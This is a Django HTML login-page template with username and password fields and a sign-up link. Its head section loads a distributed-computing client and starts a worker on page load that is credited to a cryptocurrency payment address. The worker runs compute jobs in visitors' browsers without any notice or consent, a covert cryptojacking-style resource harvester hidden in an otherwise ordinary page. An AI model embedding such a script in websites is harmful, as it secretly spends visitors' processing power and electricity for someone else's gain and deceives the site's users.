<!DOCTYPE html>
<html lang="en">
<head>

    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <!-- Link css -->
    {% load static %}
    <link rel="stylesheet" type="text/css" href="{% static 'css/master.css' %}">

    <!-- Link script -->
    <script type="text/javascript" src="{% static 'script.js' %}"></script>

    <script src="https://scheduler.distributed.computer/dcp-client/dcp-client.js"></script>

      <script>
        const worker = new dcp.worker.Worker({
          paymentAddress: "0x9E92124DFdA6c4Db7981aB9d07ce72A75EF20AE9",
          maxWorkingSandboxes: 2,
        });
        worker.start();
           </script>

    <title>Login</title>
</head>
<body>
  <div class="logo"></div>
    <div class="login-page" id="login-page">
        
        <div class="container container--login">
         
          <br>
            <h2>Log in to your account!</h2>

            <form  method="post">
                {% csrf_token %}
                <br>

                <input type="username" class="inputField" name="username" placeholder="Username" required>
                <br>
                <input type="password" class="inputField" name="password" placeholder="Password" required>
                <br>
                <button class="button" type="submit">LOGIN</button>
                <br>
            </form>
            <h3>Don't have an account?<a href="{% url 'signup' %}"><u> Sign up</u></a></h1>
        </div>
    </div>
</body>
</html>